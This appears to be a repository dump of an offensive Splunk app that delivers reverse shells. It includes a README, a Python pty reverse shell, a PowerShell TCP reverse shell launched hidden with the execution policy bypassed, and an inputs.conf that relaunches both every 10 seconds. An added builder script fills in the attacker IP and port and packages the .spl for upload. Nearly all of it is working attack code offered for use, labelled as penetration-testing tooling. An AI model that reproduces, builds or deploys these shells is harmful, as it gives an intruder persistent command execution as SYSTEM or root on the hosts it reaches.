├── README.md
└── reverse_shell_splunk
    ├── bin
    │   ├── rev.py
    │   ├── run.bat
    │   └── run.ps1
    └── default
        └── inputs.conf

/README.md:
--------------------------------------------------------------------------------
# reverse_shell_splunk
A simple Splunk package for obtaining reverse shells on both Windows and most *nix systems.

# requirements
* Splunk administrative access (enough to install an app from a file)
* a netcat / socat listener on the attacking machine


# how to use

* Depending on the target machine, edit either rev.py (Unix-type machines) or run.ps1 (Windows machines) and enter your attacking machine's IP and port.
* Your files and directory structure should look like this:

```
reverse_shell_splunk
├── bin
│   ├── rev.py
│   ├── run.bat
│   └── run.ps1
└── default
    └── inputs.conf
```

* inputs.conf is the configuration file that tells Splunk which scripts to launch as scripted inputs and at what interval. In the example below both rev.py and run.bat are scheduled every 10 seconds; the stanza that does not match the target OS simply fails on each run (its stderr ends up in splunkd.log), so expect that noise. Splunk does not launch a .ps1 directly as a scripted input, which is why the Windows stanza points at run.bat: the batch file is a one-line wrapper that invokes PowerShell on the file with the same base name in the same directory (`%~dpn0.ps1`), i.e. run.ps1. The scripts run under the account splunkd runs as (often SYSTEM on Windows, root or a dedicated splunk user on *nix). If the shell drops, the next interval launches the script again, so keep the listener up. Whatever the scripts print to stdout is indexed under sourcetype=pentest and the app is visible under Manage Apps, so remove the app when the engagement is over.

```
[script://./bin/rev.py]
disabled = 0
interval = 10
sourcetype = pentest

[script://.\bin\run.bat]
disabled = 0
sourcetype = pentest
interval = 10
```

* Once you have finished editing the files, tar up the directory and its contents, keeping the directory and file structure shown above: the app directory itself must be the top-level entry of the archive. Lastly rename the .tgz file to .spl.

```
tar -cvzf reverse_shell_splunk.tgz reverse_shell_splunk
mv reverse_shell_splunk.tgz reverse_shell_splunk.spl
```

* Launch your listener and upload this package via the app installation page (Apps > Manage Apps > Install app from file).

```
Listener options
nc -nlvp "port"
or
socat `tty`,raw,echo=0 tcp-listen:"port"
```

Note: I have had to restart the Splunk service on Unix-type machines in my testing for this to work. No restarts are needed on Windows machines.
--------------------------------------------------------------------------------
/reverse_shell_splunk/bin/rev.py:
--------------------------------------------------------------------------------
import socket
import os
import pty

# Edit these before packaging: the IP and port your listener is on.
ip = "attacker-ip-here"
port = "attacker port here"

s = socket.socket()
s.connect((ip, int(port)))
# Wire stdin, stdout and stderr to the socket, then hand the listener a
# bash session on a pseudo-terminal so it behaves like an interactive tty.
for fd in (0, 1, 2):
    os.dup2(s.fileno(), fd)
pty.spawn("/bin/bash")
--------------------------------------------------------------------------------
/reverse_shell_splunk/bin/run.bat:
--------------------------------------------------------------------------------
@ECHO OFF
REM %~dpn0 expands to this batch file's drive, path and base name, so this
REM launches the run.ps1 sitting next to it, hidden and with the execution policy bypassed.
PowerShell.exe -exec bypass -w hidden -Command "& '%~dpn0.ps1'"
Exit
--------------------------------------------------------------------------------
/reverse_shell_splunk/bin/run.ps1:
--------------------------------------------------------------------------------
# A simple and small reverse shell. Options and help removed to save space.
# Change the hardcoded IP address and port number in the line below. Remove these help comments as well.
$client = New-Object System.Net.Sockets.TCPClient('attacker_ip_here',attacker_port_here);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

--------------------------------------------------------------------------------
/reverse_shell_splunk/default/inputs.conf:
--------------------------------------------------------------------------------
[script://./bin/rev.py]
disabled = 0
interval = 10
sourcetype = pentest

[script://.\bin\run.bat]
disabled = 0
sourcetype = pentest
interval = 10
--------------------------------------------------------------------------------
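Putting the README's build steps together (fill in the attacker IP and port, keep the directory layout, tar with the app directory on top, rename to .spl), here is an added example that is not part of the reverse_shell_splunk repo: a POSIX shell builder that substitutes the placeholders rev.py and run.ps1 carry, refuses to package if a placeholder is left behind, and checks the archive listing before you upload it. The function names `build_spl` and `make_fixture`, the stand-in files `make_fixture` writes (constructed, payload-free, same placeholders as the real files), and the IP/port in the usage line are assumptions made for this example.

```sh
#!/bin/sh
# Added example, not part of the reverse_shell_splunk repo: builds the .spl the
# README describes. Function names (build_spl, make_fixture) and the demo
# IP/port are assumptions made for this example.
set -u

APP=reverse_shell_splunk

# build_spl SRCDIR IP PORT OUTFILE
#   Copies SRCDIR to a scratch dir, fills the attacker IP/port placeholders
#   that rev.py and run.ps1 carry, refuses to package if any placeholder is
#   left, tars the copy with the app directory as the top-level entry and
#   writes OUTFILE (a .spl is just a gzipped tar), then checks the listing.
build_spl() {
    src=$1; ip=$2; port=$3; out=$4
    name=$(basename "$src")
    for f in bin/rev.py bin/run.bat bin/run.ps1 default/inputs.conf; do
        [ -f "$src/$f" ] || { echo "missing $src/$f" >&2; return 1; }
    done
    work=$(mktemp -d)
    cp -R "$src" "$work/$name"
    for f in "$work/$name/bin/rev.py" "$work/$name/bin/run.ps1"; do
        sed -e "s/attacker-ip-here/$ip/" -e "s/attacker port here/$port/" \
            -e "s/attacker_ip_here/$ip/" -e "s/attacker_port_here/$port/" \
            "$f" > "$f.tmp" && mv "$f.tmp" "$f"
    done
    if grep -rqE 'attacker[-_ ](ip|port)[-_ ]here' "$work/$name/bin"; then
        echo "placeholder still present in bin/" >&2
        rm -rf "$work"; return 1
    fi
    # -C makes "$name/..." the paths inside the archive, which is the layout Splunk expects.
    tar -czf "$out" -C "$work" "$name"
    rm -rf "$work"
    # Sanity-check the layout before uploading via Manage Apps.
    tar -tzf "$out" | grep -qx "$name/default/inputs.conf" || return 1
    tar -tzf "$out" | grep -qx "$name/bin/run.bat" || return 1
    echo "built $out"
}

# make_fixture DIR: writes a constructed stand-in tree (same placeholders as
# the real files, no payload) so build_spl can be exercised offline.
make_fixture() {
    d=$1/$APP
    mkdir -p "$d/bin" "$d/default"
    printf 'ip="attacker-ip-here"\nport="attacker port here"\n' > "$d/bin/rev.py"
    printf '@ECHO OFF\n' > "$d/bin/run.bat"
    printf "New-Object System.Net.Sockets.TCPClient('attacker_ip_here',attacker_port_here)\n" > "$d/bin/run.ps1"
    printf '[script://./bin/rev.py]\ndisabled = 0\ninterval = 10\n' > "$d/default/inputs.conf"
    echo "$d"
}

# Usage: sh build_spl.sh ./reverse_shell_splunk 10.10.14.5 4444 reverse_shell_splunk.spl
if [ "$#" -eq 4 ]; then
    build_spl "$1" "$2" "$3" "$4"
fi
```

Run it against the real `reverse_shell_splunk` directory instead of the fixture; the placeholder check is what stops you from uploading a package that phones home to the literal string `attacker_ip_here`, and the listing check catches the common mistake of tarring the contents of the directory rather than the directory itself.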